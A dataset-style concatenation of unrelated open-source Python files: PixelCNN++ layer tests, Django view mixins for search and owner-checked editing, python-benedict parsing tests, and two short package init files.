out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 2, 2, 4))
self.assert_mean_and_variance(out)
def test_conv_down(self):
model = pixelcnn.ConvDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_down_right(self):
model = pixelcnn.ConvDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose(self):
model = pixelcnn.ConvTranspose(features=4, kernel_size = (3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 6, 4, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose_down(self):
model = pixelcnn.ConvTransposeDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']["ConvWeightNorm_0"]["weightnorm_params"]
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_conv_transpose_down_right(self):
model = pixelcnn.ConvTransposeDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_pcnn_shape(self):
x = random.normal(self.rng, (2, 4, 4, 3))
model = pixelcnn.PixelCNNPP(depth=0, features=2, dropout_p=0)
out, _ = model.init_with_output(self.rng, x, train=False)
self.assertEqual(out.shape, (2, 4, 4, 100))
if __name__ == '__main__':
absltest.main()
|
mcbv/edit_custom.py | akulakov/django | 150 | 12749429 | from copy import copy
from django.forms import formsets
from django.contrib import messages
from django.db.models import Q
from django.forms.formsets import formset_factory, BaseFormSet, all_valid
from detail import *
from edit import *
class SearchFormViewMixin(BaseFormView):
ignore_get_keys = ("page", ) # TODO this should be ignored in search form?
def get_form_kwargs(self):
"""Returns the keyword arguments for instantiating the form."""
req = self.request
kwargs = dict(initial=self.get_initial())
if req.method in ("POST", "PUT"):
kwargs.update(dict(data=req.POST, files=req.FILES))
elif req.GET:
# do get form processing if there's get data that's not in ignore list
get = dict((k,v) for k,v in req.GET.items() if k not in self.ignore_get_keys)
if get:
kwargs = dict(kwargs, initial=get, data=get)
return kwargs
def form_get(self, request):
form = self.get_form()
context = self.get_context_data(form=form)
if self.request.GET:
if form.is_valid() : context.update(self.form_valid(form))
else : context.update(self.form_invalid(form))
return context
class SearchFormView(FormView, SearchFormViewMixin):
"""FormView for search pages."""
class OwnObjMixin(SingleObjectMixin):
"""Access object, checking that it belongs to current user."""
item_name = None # used in permissions error message
owner_field = "creator" # object's field to compare to current user to check permission
def permission_error(self):
name = self.item_name or self.object.__class__.__name__
return HttpResponse("You don't have permissions to access this %s." % name)
def validate(self, obj):
if getattr(obj, self.owner_field) == self.request.user:
return True
def get_object(self, queryset=None):
obj = super(OwnObjMixin, self).get_object(queryset)
return obj if self.validate(obj) else None
class DeleteOwnObjView(OwnObjMixin, DeleteView):
"""Delete object, checking that it belongs to current user."""
class UpdateOwnObjView(OwnObjMixin, UpdateView):
"""Update object, checking that it belongs to current user."""
class UpdateRelatedView(DetailView, UpdateView):
"""Update object related to detail object; create if does not exist."""
detail_model = None
form_model = None
fk_attr = None
related_name = None
def get_modelform_object(self, queryset=None):
""" Get related object: detail_model.<related_name>
If does not exist, create: form_model.<fk_attr>
"""
obj = self.get_detail_object()
kwargs = {self.fk_attr: obj}
try:
related_obj = getattr(obj, self.related_name)
except self.form_model.DoesNotExist:
related_obj = self.form_model.obj.create(**kwargs)
setattr(obj, self.related_name, related_obj)
return related_obj
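# Illustrative subclass configuration (the model and field names below are
# assumptions, not part of this module):
#
#   class UserProfileUpdateView(UpdateRelatedView):
#       detail_model = User        # object shown on the detail page
#       form_model = Profile       # related object being edited or created
#       fk_attr = "user"           # Profile field pointing back at the User
#       related_name = "profile"   # accessor on User that returns the Profile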
class SearchEditFormset(SearchFormView):
"""Search form filtering a formset of items to be updated."""
model = None
formset_class = None
form_class = None
def get_form_class(self):
if self.request.method == "GET": return self.form_class
else: return self.formset_class
def get_queryset(self, form=None):
return self.model.objects.filter(self.get_query(form))
def get_query(self, form):
"""This method should always be overridden, applying search from the `form`."""
return Q()
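    # An override might look like this (illustrative; ``q`` is an assumed
    # search-form field):
    #
    #   def get_query(self, form):
    #       return Q(name__icontains=form.cleaned_data.get("q", ""))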
def form_valid(self, form):
formset = None
if self.request.method == "GET":
formset = self.formset_class(queryset=self.get_queryset(form))
else:
form.save()
messages.success(self.request, "%s(s) were updated successfully" % self.model.__name__.capitalize())
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def form_invalid(self, form):
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def get(self, request, *args, **kwargs):
form = self.get_form()
if form.is_bound:
if form.is_valid(): return self.form_valid(form)
else: return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
|
tests/dicts/parse/test_parse_util.py | next-franciscoalgaba/python-benedict | 365 | 12749433 | <reponame>next-franciscoalgaba/python-benedict<gh_stars>100-1000
# -*- coding: utf-8 -*-
from benedict.dicts.parse import parse_util
import unittest
class parse_util_test_case(unittest.TestCase):
def test_parse_bool(self):
f = parse_util.parse_bool
self.assertTrue(f(1))
self.assertTrue(f(True))
self.assertTrue(f('1'))
self.assertTrue(f('True'))
self.assertTrue(f('Yes'))
self.assertTrue(f('Ok'))
self.assertTrue(f('On'))
self.assertFalse(f(None))
self.assertFalse(f(0))
self.assertFalse(f(False))
self.assertFalse(f('0'))
self.assertFalse(f('False'))
self.assertFalse(f('No'))
self.assertFalse(f('Ko'))
self.assertFalse(f('Off'))
def test_parse_date(self):
# TODO
pass
def test_parse_datetime(self):
# TODO
pass
def test_parse_decimal(self):
# TODO
pass
def test_parse_dict(self):
# TODO
pass
def test_parse_float(self):
# TODO
pass
def test_parse_email(self):
# TODO
pass
def test_parse_int(self):
# TODO
pass
def test_parse_list(self):
f = lambda value: parse_util.parse_list(value, separator=',')
self.assertEqual(f(['0', '1', '2', 'Hello World']), ['0', '1', '2', 'Hello World'])
self.assertEqual(f('0,1,2'), ['0', '1', '2'])
self.assertEqual(f('0'), ['0'])
self.assertEqual(f('1'), ['1'])
self.assertEqual(f(''), None)
self.assertEqual(f(None), None)
def test_parse_list_with_valid_json(self):
f = lambda value: parse_util.parse_list(value, separator=None)
self.assertEqual(f('[0,1,2,3]'), [0, 1, 2, 3])
def test_parse_list_with_invalid_json_with_separator(self):
f = lambda value: parse_util.parse_list(value, separator=',')
self.assertEqual(f('[a,b,c]'), ['[a', 'b', 'c]'])
def test_parse_list_with_invalid_json_without_separator(self):
f = lambda value: parse_util.parse_list(value, separator=None)
self.assertEqual(f('[a,b,c]'), None)
def test_parse_phonenumber(self):
# TODO
pass
def test_parse_slug(self):
# TODO
pass
def test_parse_str(self):
# TODO
pass
def test_parse_uuid(self):
# TODO
pass
|
TradzQAI/core/__init__.py | kkuette/AI_project | 164 | 12749446 | from .environnement import Local_env
from .environnement import Live_env
from .worker import Local_Worker
from .worker import Live_Worker
from .session import Local_session
from .session import Live_session
|
custom_components/local_luftdaten/__init__.py | Aulos/local_luftdaten | 163 | 12749452 | """
Support for local Luftdaten sensors.
Copyright (c) 2019 <NAME>
Licensed under MIT. All rights reserved.
https://github.com/lichtteil/local_luftdaten/
"""
|